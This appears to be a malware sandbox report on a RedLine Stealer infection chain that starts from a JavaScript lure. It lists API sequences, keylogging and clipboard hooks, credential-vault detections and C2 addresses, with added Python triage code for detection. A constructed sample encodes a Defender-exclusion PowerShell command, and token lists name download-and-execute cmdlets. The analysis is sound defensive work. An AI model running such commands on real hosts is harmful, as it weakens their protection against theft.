                                Source: Binary string: wntdll.pdb source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00452492
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00442886
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_004788BD
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,2_2_004339B6
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,2_2_0045CAFA
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00431A86
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,2_2_0044BD27
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0045DE8F FindFirstFileW,FindClose,2_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 2_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0044BF8B
Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 4_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00452492
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00442886
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004788BD
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004339B6
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,4_2_0045CAFA
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00431A86
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,4_2_0044BD27
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045DE8F FindFirstFileW,FindClose,4_2_0045DE8F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0044BF8B
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                                Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 032078DCh17_2_03207642
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_03207E60
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 032078DCh17_2_0320767A
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_03207E58
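The wscript.exe to powershell.exe parent/child relationship recorded above is the pivot a detection engineer would key on: a script host has no legitimate reason to launch PowerShell on most endpoints, and droppers of this kind routinely pass the payload as a base64 -EncodedCommand so the clear-text cmdlets never appear on the command line. The following Python is an added example, not code from the Joe Sandbox report or from the sample; it triages constructed process-creation events for that chain and decodes the UTF-16LE base64 argument PowerShell expects. The event layout, the control event and the decoded payload (a Defender exclusion) are assumptions for illustration, not data recovered from the analysis.

```python
"""Triage process-creation events for script-host -> PowerShell chains.

Added example (not part of the sandbox report). The events below are
constructed to mirror the report's parent/child pair (wscript.exe spawning
powershell.exe); field names, command lines and the payload are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Cmdlets and arguments worth flagging once the command line is readable.
SUSPICIOUS_TOKENS = (
    "Add-MpPreference", "Set-MpPreference", "ExclusionPath",
    "DownloadString", "IEX", "Invoke-Expression",
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def encode_for_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none (or it is not valid)."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def triage(events) -> list:
    """Flag script-host -> PowerShell children and report suspicious tokens in the decoded command."""
    findings = []
    for ev in events:
        parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
        child = ev.image.rsplit("\\", 1)[-1].lower()
        if parent not in SCRIPT_HOSTS or child not in POWERSHELL:
            continue
        decoded = decode_encoded_command(ev.command_line)
        visible = decoded if decoded is not None else ev.command_line
        hits = [t for t in SUSPICIOUS_TOKENS
                if re.search(r"\b" + re.escape(t) + r"\b", visible, re.IGNORECASE)]
        findings.append({"pid": ev.pid, "parent": parent, "child": child,
                         "encoded": decoded is not None, "decoded": decoded, "tokens": hits})
    return findings


# Constructed sample: the report's chain (wscript.exe -> powershell.exe) plus a benign control.
SAMPLE_SCRIPT = 'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Local\\Temp"'  # assumed payload
SAMPLE_EVENTS = [
    ProcEvent(1234, r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT)),
    ProcEvent(1300, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Matching on the decoded text rather than the raw command line is what makes the rule robust: the base64 blob looks different for every build, while the cmdlet names inside it do not. Expect some noise from administrative tooling that legitimately calls PowerShell from scripts; the script-host parent filter keeps that manageable.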

                                Networking

                                Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:2049 -> 192.168.2.8:62827
                                Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:2049 -> 192.168.2.8:62827
                                Source: Malware configuration extractorURLs: 212.162.149.53:2049
                                Source: global trafficTCP traffic: 192.168.2.8:62827 -> 212.162.149.53:2049
                                Source: global trafficTCP traffic: 192.168.2.8:62828 -> 51.195.88.199:587
                                Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
                                Source: Joe Sandbox ViewIP Address: 51.195.88.199 51.195.88.199
                                Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                                Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                Source: unknown DNS query: name: api.ipify.org
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                                Source: unknown TCP traffic detected without corresponding DNS query: 212.162.149.53 (50 occurrences)
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004422FE InternetQueryDataAvailable,InternetReadFile,2_2_004422FE
                                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                                Source: unknownNetwork traffic detected: HTTP traffic on port 62826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62826
                                Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:62826 version: TLS 1.2
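Three of the network observations above carry most of the signal: repeated TCP connections to 212.162.149.53:2049 with no DNS lookup behind them (the C2 endpoint the configuration extractor also reports), an HTTP GET to api.ipify.org to learn the victim's public address, and an outbound connection to 51.195.88.199:587, the mail submission port. The Python below is an added example, not part of the Joe Sandbox report; it implements the "TCP traffic without corresponding DNS query" correlation over constructed DNS and flow records and tags the other two patterns. The log formats, the hostname-to-IP mappings and the list of IP-echo services are assumptions; only the IOC 212.162.149.53:2049 and the hostnames come from the report.

```python
"""Correlate DNS answers with TCP flows to surface raw-IP C2 connections.

Added example, not part of the sandbox report. The log lines are constructed
to resemble the report's observations; the line format and the name-to-IP
mappings are assumptions.
"""
import re
from collections import Counter, defaultdict

# Constructed DNS log: "<query name> <rtype> <answer>" (NXDOMAIN when nothing resolved).
DNS_LOG = """\
api.ipify.org A 104.26.13.205
pywolwnvd.biz A NXDOMAIN
s82.gocheapweb.com A 51.195.88.199
"""

# Constructed flow log: "tcp <src ip>:<src port> -> <dst ip>:<dst port>".
FLOW_LOG = """\
tcp 192.168.2.8:62826 -> 104.26.13.205:443
tcp 192.168.2.8:62827 -> 212.162.149.53:2049
tcp 192.168.2.8:62827 -> 212.162.149.53:2049
tcp 192.168.2.8:62827 -> 212.162.149.53:2049
tcp 192.168.2.8:62828 -> 51.195.88.199:587
"""

# Indicator taken from the report's malware configuration extractor.
KNOWN_C2 = {("212.162.149.53", 2049)}
# Public IP-echo services stealers call to geolocate the victim (assumed list).
IP_CHECK_HOSTS = {"api.ipify.org", "ipinfo.io", "checkip.amazonaws.com"}
MAIL_PORTS = {25, 465, 587}

FLOW_RE = re.compile(r"^tcp (\S+):(\d+) -> (\S+):(\d+)$")


def parse_dns(log: str) -> dict:
    """Map every answered IP to the set of names that resolved to it."""
    ip_to_names = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        name, _rtype, answer = line.split()
        if answer != "NXDOMAIN":
            ip_to_names[answer].add(name)
    return ip_to_names


def triage_flows(flow_log: str, dns_log: str) -> dict:
    """Count DNS-less destinations and tag known C2, IP-echo lookups and mail submission."""
    ip_to_names = parse_dns(dns_log)
    no_dns = Counter()
    findings = []
    for line in flow_log.splitlines():
        m = FLOW_RE.match(line)
        if not m:
            continue
        _src, _sport, dst, dport = m.groups()
        dport = int(dport)
        names = ip_to_names.get(dst, set())
        if not names:
            # The sandbox heuristic: a connection whose target was never resolved by name.
            no_dns[(dst, dport)] += 1
        if (dst, dport) in KNOWN_C2:
            findings.append(f"known C2 indicator: {dst}:{dport}")
        if names & IP_CHECK_HOSTS:
            findings.append(f"public IP lookup via {sorted(names & IP_CHECK_HOSTS)[0]} ({dst}:{dport})")
        if dport in MAIL_PORTS:
            findings.append(f"outbound mail submission to {dst}:{dport} ({', '.join(sorted(names)) or 'no DNS'})")
    for (dst, dport), n in sorted(no_dns.items()):
        findings.append(f"{n} TCP connection(s) to {dst}:{dport} without a preceding DNS query")
    # Repeated flows to the same C2 produce the same message; keep one copy, in order.
    return {"no_dns": dict(no_dns), "findings": list(dict.fromkeys(findings))}


if __name__ == "__main__":
    for f in triage_flows(FLOW_LOG, DNS_LOG)["findings"]:
        print(f)
```

Hard-coded IP:port destinations are a strong signal because almost all legitimate software resolves a name first; the usual false positives are software updaters and telemetry endpoints pinned to an IP, so review the destination's ASN before acting on a hit. A connection to TCP/587 from a workstation that is not a mail client is worth a look in its own right, since this is a common exfiltration channel for credential stealers.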

                                Key, Mouse, Clipboard, Microphone and Screen Capturing

                                Source: neworigin.exe.16.dr, cPKWk.cs.Net Code: I3Mi2zn6x
                                Source: 16.2.svchost.exe.314b000.1.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0045A10F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,2_2_0046DC80
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,2_2_0044C37A
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0047C81C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_0047C81C

                                System Summary

                                Source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                                Source: server_BTC.exe.16.dr, opqcmgIPmeabY.csLong String: Length: 17605
                                Source: 16.2.svchost.exe.3112000.3.raw.unpack, opqcmgIPmeabY.csLong String: Length: 17605
                                Source: TrojanAIbot.exe.17.dr, opqcmgIPmeabY.csLong String: Length: 17605
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsInitial file: wscript.shell, adodb.stream, wmic
                                Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
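The initial .js file contains the strings wscript.shell, adodb.stream and wmic, and at run time wscript.exe resolves exactly those two ProgIDs to the CLSIDs listed above. That combination (a shell object to execute, a binary stream object to write a file, and an oversized string to carry the payload) is the signature of a WSH dropper and can be triaged statically before anything is detonated. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it scans a constructed stand-in script for ActiveXObject ProgIDs, maps them to the CLSIDs recorded in the report, and counts string literals over the 50-character threshold the report uses. The sample script, the scoring and the regexes are assumptions for illustration; the real dropper's source is not on this page.

```python
"""Static triage of a WSH JavaScript dropper: ActiveX ProgIDs and long strings.

Added example, not part of the sandbox report. SAMPLE_JS is a constructed
stand-in for the analysed .js file; only the ProgID names and CLSIDs are taken
from the report's "COM Object queried" lines.
"""
import re

# ProgID -> CLSID as recorded in the report.
PROGID_CLSID = {
    "adodb.stream": "{00000566-0000-0010-8000-00AA006D2EA4}",
    "wscript.shell": "{72C24DD5-D70A-438B-8A42-98424B88AFB8}",
}
# Other tokens the report lists for the initial file.
OTHER_TOKENS = ("wmic",)

LONG_STRING_THRESHOLD = 50  # the report flags strings bigger than 50 characters

# new ActiveXObject("ProgID") / ActiveXObject('ProgID'), any casing.
PROGID_RE = re.compile(r"""ActiveXObject\s*\(\s*(["'])(.*?)\1\s*\)""", re.IGNORECASE)
# Single-line JS string literals, honouring backslash escapes.
STRING_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def triage_js(source: str) -> dict:
    """Summarise ActiveX usage and payload-sized strings in a WSH script."""
    progids = {}
    for _quote, progid in PROGID_RE.findall(source):
        key = progid.lower()
        progids[key] = PROGID_CLSID.get(key, "unknown CLSID")
    literals = [s for _quote, s in STRING_RE.findall(source)]
    long_strings = [s for s in literals if len(s) > LONG_STRING_THRESHOLD]
    other = [t for t in OTHER_TOKENS if re.search(re.escape(t), source, re.IGNORECASE)]
    # One point per ActiveX object, per extra token, and one for any oversized literal.
    score = len(progids) + len(other) + (1 if long_strings else 0)
    return {
        "progids": progids,
        "long_strings": len(long_strings),
        "longest": max((len(s) for s in literals), default=0),
        "other_tokens": other,
        "score": score,
    }


# Constructed stand-in script: shell object, stream object, an oversized literal, a wmic call.
SAMPLE_JS = (
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'var st = new ActiveXObject("ADODB.Stream");\n'
    'var blob = "' + "TVqQAAMAAAAEAAAA" + "A" * 80 + '";\n'   # 96-character literal, constructed
    'sh.Run("wmic os get caption", 0, true);\n'
)

if __name__ == "__main__":
    print(triage_js(SAMPLE_JS))
```

Two caveats when using this on real samples: obfuscated droppers often build the ProgID at run time ("WScr" + "ipt.Shell"), so a miss on PROGID_RE is not a clean bill of health, and the long-string check is only a proxy for an embedded payload; the confirming step is to decode the literal and look for an MZ header, which is what the ADODB.Stream write to %TEMP% in this chain ultimately produces.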
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,2_2_00431BE8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00446313
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004096A02_2_004096A0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042200C2_2_0042200C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041A2172_2_0041A217
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004122162_2_00412216
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042435D2_2_0042435D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004033C02_2_004033C0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044F4302_2_0044F430
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004125E82_2_004125E8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044663B2_2_0044663B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004138012_2_00413801
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0042096F2_2_0042096F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004129D02_2_004129D0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004119E32_2_004119E3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041C9AE2_2_0041C9AE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047EA6F2_2_0047EA6F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040FA102_2_0040FA10
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044EB5F2_2_0044EB5F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00423C812_2_00423C81
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00411E782_2_00411E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00442E0C2_2_00442E0C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00420EC02_2_00420EC0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044CF172_2_0044CF17
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00444FD22_2_00444FD2
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_047394002_2_04739400
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004096A04_2_004096A0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042200C4_2_0042200C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041A2174_2_0041A217
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004122164_2_00412216
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042435D4_2_0042435D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004033C04_2_004033C0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044F4304_2_0044F430
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004125E84_2_004125E8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044663B4_2_0044663B
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004138014_2_00413801
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042096F4_2_0042096F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004129D04_2_004129D0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004119E34_2_004119E3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0041C9AE4_2_0041C9AE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0047EA6F4_2_0047EA6F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040FA104_2_0040FA10
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044EB5F4_2_0044EB5F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00423C814_2_00423C81
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00411E784_2_00411E78
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00442E0C4_2_00442E0C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00420EC04_2_00420EC0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0044CF174_2_0044CF17
